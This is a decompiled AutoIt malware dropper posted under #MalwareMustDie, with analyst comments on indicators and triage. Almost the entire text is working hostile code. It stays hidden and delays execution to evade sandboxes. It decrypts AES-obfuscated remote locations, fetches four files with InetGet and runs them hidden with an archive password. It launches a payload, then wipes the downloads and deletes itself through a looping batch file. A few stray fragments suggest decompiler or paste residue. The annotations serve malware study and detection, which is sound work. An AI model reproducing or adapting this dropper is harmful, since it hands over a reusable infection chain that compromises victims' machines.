- // Brazil AutoIt Malware - Dropper & Shellexec
- // #MalwareMustDie
- ; Startup guard: hide the tray icon and make sure only one copy of the script runs.
- ; Analyst note: the hard-coded mutex name below is a fixed string in this sample, which
- ; makes it usable as a host-based indicator when triaging a machine.
- Opt("TrayIconHide", 1) ; suppress the AutoIt tray icon so no UI is visible
- Global $hmutex
- Local $closehandle
- If createmutex("1iu1gx6wtf8XX8Qgs23WglF7pHVE7", $hmutex) Then
- Sleep(0)
- Else
- ; createmutex() returned 0: the named mutex already existed, so release handles and quit.
- $closehandle = DllCall("kernel32.dll", "int", "CloseHandle", "long", $hmutex[0])
- onautoitexit()
- Exit
- EndIf
- ; Start-up delay: poll every 250 ms until 25 seconds have elapsed, then continue.
- ; TimerDiff() is divided by 1000 before the comparison, so the threshold is in seconds.
- ; NOTE(review): nothing else happens in this loop; presumably the wait is meant to outlast
- ; short automated analysis runs - confirm against sandbox timeouts in use.
- $init = TimerInit()
- While 1
- Sleep(250)
- $diff = TimerDiff($init)
- If $diff / 1000 >= 25 Then
- Sleep(0)
- ExitLoop
- EndIf
- WEnd
- ; Embedded configuration. The long hex strings are ciphertext: each one is passed to
- ; strcrpt(False, ext(3) & <hex>, <password>) at the point of use, so no URL, path or file
- ; name appears in clear text in this listing.
- ; $key   - password for $lk, $fk, $array[0..3,5,6], $fl[] and the ext() strings; it is the
- ;          same string that is passed to createmutex() at startup.
- ; $s121  - second password, used only for the $str1[] entries.
- ; $lk    - decrypted and prefixed to $array[0..3] to form the four locations given to dow().
- ; $fk    - decrypted and handed to ShellExecute() as the first action of the main flow.
- ; $pass and $array[4] (" *.mp4") are NOT encrypted; both are concatenated as-is into the
- ;          command lines built for sh(). presumably $pass is an archive password - TODO confirm.
- ; $base[] receives the local path of each download (written by dow()).
- ; $fl[0] is the file name checked and launched after the first sh() call; $fl[1] is the
- ;          file name used for the third download.
- Local $key = "1iu1gx6wtf8XX8Qgs23WglF7pHVE7"
- Local $lk = "334865BC36520346E0C1E1E80E851C9C85E28EAFDF2ED9C435EE1DB8659FB331"
- Local $fk = "7F526C99C294202AAD308A719AE29C93ABC72DC4A3DACE0C5A5AA8B2C5F69F37BE5684BEABE0EC9D6C66552570142913"
- Local $pass = "102030as"
- Local $s121 = "V0jB3Lk1S0ohgZYQrMl4pj"
- Local $vrtmp = ""
- Dim $base[4]
- Dim $array[7]
- $array[0] = "DD5AA5D0CC90E3A5093C88EE117132A1"
- $array[1] = "BCDA98C9F0011641ABD2BF11F2AC4587"
- $array[2] = "1F2F3D08ADA1FB0214BE2862C3ADE4AD"
- $array[3] = "AF94BB46CE3C9472E13AA925608FC37F"
- $array[4] = " *.mp4"
- $array[5] = "21CF70074AE1586E22D93C743A4CF40E"
- $array[6] = "93BE9C9A468F5C4543C1ED8CAB332A5FE3C001E933669C7D4BD959A2196637CC"
- Dim $fl[2]
- $fl[0] = "1DC242A0B18F861AD153F4903CB6403A"
- $fl[1] = "ACC16D423118CEA4717FA852B1EA3E3C"
- ; $str1[] is only sized here; its seven ciphertext entries are assigned further down.
- Dim $str1[7]
- ; createmutex($mutex, ByRef $hmutex)
- ; Creates the named mutex $mutex through kernel32!CreateMutexA and reports whether this
- ; process is the first holder.
- ;   $mutex  - mutex name (string).
- ;   $hmutex - receives the DllCall() result array; element [0] is the returned handle.
- ; Returns 1 when the mutex was newly created, 0 when GetLastError reports
- ; ERROR_ALREADY_EXISTS (183). In the 0 case the handle is closed here before returning.
- Func createmutex($mutex, ByRef $hmutex)
- Dim $error_already_exists = 183
- Dim $lasterror, $closehandle
- Dim $retval
- ; second argument "int", 1 requests initial ownership of the mutex
- $hmutex = DllCall("kernel32.dll", "long", "CreateMutexA", "ptr", 0, "int", 1, "str", $mutex)
- $lasterror = DllCall("kernel32.dll", "long", "GetLastError")
- If $lasterror[0] = $error_already_exists Then
- $closehandle = DllCall("kernel32.dll", "int", "CloseHandle", "long", $hmutex[0])
- $retval = 0
- Else
- $retval = 1
- EndIf
- Return $retval
- EndFunc
- ; onautoitexit()
- ; Releases and closes the global mutex handle, but only when $hmutex holds a DllCall()
- ; result array (IsArray check), i.e. when createmutex() actually ran.
- ; NOTE(review): older AutoIt releases call a function with this name automatically at
- ; exit - confirm against the AutoIt version the sample was built with.
- Func onautoitexit()
- Dim $releasemutex, $closehandle
- If IsArray($hmutex) Then
- $releasemutex = DllCall("kernel32.dll", "int", "ReleaseMutex", "long", $hmutex[0])
- $closehandle = DllCall("kernel32.dll", "int", "CloseHandle", "long", $hmutex[0])
- EndIf
- EndFunc
- ; ext($n)
- ; Small string table used by the rest of the script.
- ;   $n = 1 or 2 - returns $arext[0] / $arext[1] decrypted with the global $key
- ;                 (presumably file extensions, since nmfl() appends the result to a
- ;                 generated name - TODO confirm by decrypting in an isolated lab).
- ;   $n = 3      - returns $arext[2], the literal prefix "0x".
- ; Any other $n falls through the Select and returns nothing explicit.
- Func ext($n)
- Dim $nm
- Dim $arext[3]
- $arext[0] = "C05D7B097FE50E38BEBADAD08D7C6E9A"
- $arext[1] = "AFCFA0ADFA04EA6120BFAEB086014AE9"
- ; 1899 - 1899 evaluates to 0 before the & concatenation, so this builds "0x" without the
- ; literal appearing in the script. Callers prepend it to every hex ciphertext string.
- $arext[2] = 1899 - 1899 & "x"
- Select
- Case $n = 1
- $nm = strcrpt(False, ext(3) & $arext[0], $key)
- Return $nm
- Case $n = 2
- $nm = strcrpt(False, ext(3) & $arext[1], $key)
- Return $nm
- Case $n = 3
- $nm = $arext[2]
- Return $nm
- EndSelect
- EndFunc
- ; nmfl($v, $nmex, $qtd)
- ; Generates a random lowercase file or directory name.
- ;   $v    - 1 to append the string returned by ext($nmex); any other value returns the
- ;           bare name.
- ;   $nmex - selector forwarded to ext(); ignored unless $v = 1.
- ;   $qtd  - upper loop bound; the loop runs from 0 To $qtd, so an integer $qtd yields
- ;           $qtd + 1 characters.
- ; Analyst note: names produced here differ on every run, so file names are not reliable
- ; indicators for this sample; the directories and behaviour are.
- Func nmfl($v, $nmex, $qtd)
- Dim $name
- Dim $ext
- For $i = 0 To $qtd
- ; non-zero third argument makes Random() return an integer, here a code point in a..z
- $name = $name & Chr(Random(Asc("a"), Asc("z"), 6))
- Next
- If $v = 1 Then
- $ext = ext($nmex)
- Return $name & $ext
- Else
- Return $name
- EndIf
- EndFunc
- ; dow($lk, $dr, $fl, $nm)
- ; Fetches one remote file to disk.
- ;   $lk - source location passed to InetGet().
- ;   $dr - destination directory (created if missing); callers pass it with a trailing "\".
- ;   $fl - destination file name.
- ;   $nm - index into the script-level $base[] array where the full local path is recorded.
- ; The path is stored in $base[$nm] before anything else, whether or not a download
- ; happens. The download is skipped when the destination file already exists.
- ; No return value or InetGet() result is checked.
- Func dow($lk, $dr, $fl, $nm)
- $base[$nm] = $dr & $fl
- DirCreate($dr)
- If NOT FileExists($dr & $fl) Then
- InetGet($lk, $dr & $fl)
- EndIf
- EndFunc
- ; sh($infl, $prm)
- ; Launches the file $infl with command-line parameters $prm using the "open" verb and a
- ; hidden window (@SW_HIDE). Does nothing when $infl does not exist.
- ; Analyst note: the hidden window means the child process has no visible UI; process
- ; creation telemetry is the place to look for it.
- Func sh($infl, $prm)
- If FileExists($infl) Then
- ShellExecute($infl, $prm, "", "open", @SW_HIDE)
- EndIf
- EndFunc
- ; gtdir($sfilepath)
- ; Returns the directory part of a Windows path by removing the last backslash and
- ; everything after it. The result has no trailing backslash.
- ; For a non-string argument it sets @error to 1 and returns -1.
- Func gtdir($sfilepath)
- If NOT IsString($sfilepath) Then
- Return SetError(1, 0, -1)
- EndIf
- ; regex: a backslash followed by non-backslash characters up to end of string
- Local $filedir = StringRegExpReplace($sfilepath, "\\[^\\]*$", "")
- Return $filedir
- EndFunc
- ; un()
- ; Self-removal: writes a batch file that keeps deleting the running executable
- ; (@AutoItExe) until it is gone, then deletes the batch file itself, and starts that
- ; batch file with a hidden window.
- ; NOTE(review): no "\" is inserted between @TempDir and the generated name, so the .bat
- ; path presumably resolves next to the temp folder rather than inside it, with the folder
- ; name as a prefix - confirm on a lab run before relying on it for artefact collection.
- ; Analyst note: after this runs the original executable is absent from disk, so
- ; acquisition has to rely on memory, prefetch/process telemetry or the downloaded files.
- Func un()
- Local $srbt = @TempDir & nmfl(0, 0, 8) & ".bat"
- ; mode 2 opens the file for writing and discards previous contents
- Local $hrbt = FileOpen($srbt, 2)
- FileWrite($hrbt, ":start" & @CRLF & 'del "' & @AutoItExe & '"' & @CRLF & 'IF EXIST "' & @AutoItExe & '" goto start' & @CRLF & 'del "' & $srbt & '"')
- FileClose($hrbt)
- Run($srbt, "", @SW_HIDE)
- EndFunc
- ; strcrpt($bencrypt, $sdata, $spassword)
- ; String obfuscation helper built on AES-256 with a password.
- ;   $bencrypt  - True to encrypt $sdata, False to decrypt it.
- ;   $sdata     - plaintext, or ciphertext (callers pass "0x" & hex string).
- ;   $spassword - password given to the crypt routine.
- ; Returns the encrypted data, or the decrypted data converted with BinaryToString().
- ; Every call in this listing passes False, i.e. the script only ever decrypts.
- ; NOTE(review): _crypt_* and $calg_aes_256 are not defined in this listing; the names
- ; match AutoIt's Crypt UDF, so presumably its include was lost in decompilation - confirm.
- Func strcrpt($bencrypt, $sdata, $spassword)
- _crypt_startup()
- Local $sreturn = ""
- If $bencrypt Then
- $sreturn = _crypt_encryptdata($sdata, $spassword, $calg_aes_256)
- Else
- $sreturn = BinaryToString(_crypt_decryptdata($sdata, $spassword, $calg_aes_256))
- EndIf
- _crypt_shutdown()
- Return $sreturn
- EndFunc
- ; NOTE(review): the bare identifier on the next line is not a statement; it looks like
- ; residue from the paste or decompiler output rather than part of the script.
- strcrpt
- ; Base directories used by the main flow, each ending in "\":
- ;   $tmp  - the user's temp folder
- ;   $drmd - the user's application-data folder
- ;   $drcp - root of the drive that holds the Windows directory (first two characters of
- ;           @WindowsDir plus "\")
- ; NOTE(review): the trailing ;" and :" fragments look like the poster's attempt to
- ; rebalance quotes for syntax highlighting, not original code - confirm against a sample.
- $tmp = @TempDir & "\" ;"
- $drmd = @AppDataDir & "\" :"
- $drcp = StringMid(@WindowsDir, 1, 2) & "\"
- ; Ciphertext fragments of the command lines and the ShellExecute verb. Each is decrypted
- ; with the second password ($s121) where it is used in the main flow.
- $str1[0] = "A407B24B41A4AEA6C7DE8D84838569E8"
- $str1[1] = "35088C13149E3DAF5ED9EE207437B6F7"
- $str1[2] = "5F675C8B3973DD8C854DEDA25DB0F213"
- $str1[3] = "06F84E0A3F617F500F43A1661398D5DA"
- $str1[4] = "8956BA696DC2C905DA982296B1AD83C5"
- $str1[5] = "72DCE8B08F9EA9962B798A98251FDA8D"
- $str1[6] = "A0A960A1A6B5E25944CD3510DF58C38F" ;"
- ; Main flow. Behaviour summary for triage (all targets stay encrypted until run time):
- ;   1. ShellExecute a decrypted target with a visible window.
- ;   2. Download two files: one into the temp folder, one into a new randomly named
- ;      directory under the system drive root.
- ;   3. Run the first download hidden, with the second download's path in its arguments.
- ;   4. Launch a fixed-name file from the second download's directory if it appeared,
- ;      otherwise trigger self-removal.
- ;   5. Download two more files (temp folder and application-data folder), run the first
- ;      download again against the fourth, then delete the downloads and self-remove.
- ; Detection-relevant behaviour: outbound fetches via InetGet, hidden child processes,
- ; new directories under the drive root and application data, and a self-deleting .bat.
- ;
- ; Step 1: the only visible launch (@SW_SHOW); the verb argument is itself decrypted.
- ; NOTE(review): presumably a decoy shown to the user - confirm by decrypting in a lab.
- ShellExecute(strcrpt(False, ext(3) & $fk, $key), "", "", strcrpt(False, ext(3) & $str1[6], $s121), @SW_SHOW)
- ; Step 2a: first download -> temp folder, random name plus the ext(1) suffix; path kept in $base[0].
- dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[0], $key), $tmp, nmfl(1, 1, Random(5, 10)), 0)
- ; Step 2b: second download -> <system drive>\<decrypted $array[5]><random>\<random>; path kept in $base[1].
- dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[1], $key), $drcp & strcrpt(False, ext(3) & $array[5], $key) & nmfl(0, 2, Random(3, 5)) & "\", nmfl(0, 2, Random(5, 10)), 1)
- Sleep(5000)
- ; directory of the second download, with a trailing "\"
- $vrtmp = gtdir($base[1]) & "\" ;"
- ; Step 3: run $base[0] hidden; arguments combine decrypted fragments, the path in $base[1],
- ; the plaintext $pass and the target directory $vrtmp.
- ; NOTE(review): this argument shape suggests $base[0] is an unpacking tool and $base[1] a
- ; password-protected archive - inferred, not shown by the listing.
- sh($base[0], strcrpt(False, ext(3) & $str1[0], $s121) & $base[1] & strcrpt(False, ext(3) & $str1[2], $s121) & strcrpt(False, ext(3) & $str1[3], $s121) & $pass & strcrpt(False, ext(3) & $str1[5], $s121) & $vrtmp)
- Sleep(10000)
- ; Step 4: launch the expected file if step 3 produced it; otherwise start self-removal.
- ; There is no Exit after un(), so the statements below still run in that case.
- If FileExists($vrtmp & strcrpt(False, ext(3) & $fl[0], $key)) Then
- ShellExecute($vrtmp & strcrpt(False, ext(3) & $fl[0], $key))
- Else
- un()
- EndIf
- ; Step 5a: third download -> temp folder under the decrypted $fl[1] name; path kept in $base[2].
- dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[2], $key), $tmp, strcrpt(False, ext(3) & $fl[1], $key), 2)
- ; Step 5b: fourth download -> <application data>\<decrypted $array[6]><random>; path kept in $base[3].
- dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[3], $key), $drmd & strcrpt(False, ext(3) & $array[6], $key), nmfl(0, 2, Random(5, 10)), 3)
- Sleep(5000)
- ; Step 5c: run $base[0] hidden again, this time against $base[3], with the plaintext
- ; " *.mp4" pattern ($array[4]) included in the arguments.
- sh($base[0], strcrpt(False, ext(3) & $str1[1], $s121) & $base[3] & strcrpt(False, ext(3) & $str1[2], $s121) & strcrpt(False, ext(3) & $str1[3], $s121) & $pass & strcrpt(False, ext(3) & $str1[5], $s121) & $drmd & strcrpt(False, ext(3) & $array[6], $key) & $array[4] & strcrpt(False, ext(3) & $str1[4], $s121))
- Sleep(20000)
- ; Cleanup: retry deleting $base[0] until it is gone, then remove $base[1] and $base[3].
- ; $base[2] is not deleted here, so that file remains on disk as an artefact.
- While FileExists($base[0])
- FileDelete($base[0])
- WEnd
- FileDelete($base[1])
- FileDelete($base[3])
- ; final self-removal of the running executable
- un()